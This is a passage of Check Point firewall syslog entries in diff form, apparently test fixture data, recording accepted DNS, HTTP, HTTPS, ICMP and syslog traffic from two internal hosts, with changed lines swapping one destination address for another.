loguid:"{0x5e80d336,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53670"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43490"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42649"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; 
inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33354"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43491"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32851"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32851"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] 
<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.16"; icmp:"Echo Request"; icmp_code:"0"; icmp_type:"8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"1"; service_id:"echo-request"; src:"192.168.2.2"] -<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53132"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53132"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:56:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d351,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T16:56:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d352,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; 
src:"192.168.1.100"] <134>1 2020-03-29T16:56:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d357,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36215"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] -<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47671"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47671"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.187"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51746"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34871"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] 
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34871"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"52.17.223.107"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43558"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39427"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43009"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55380"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39427"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43009"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55380"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"93.184.220.29"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46506"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35896"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35896"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"54.70.228.208"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45452"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49166"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49166"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.81"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39708"; service:"443"; service_id:"https"; 
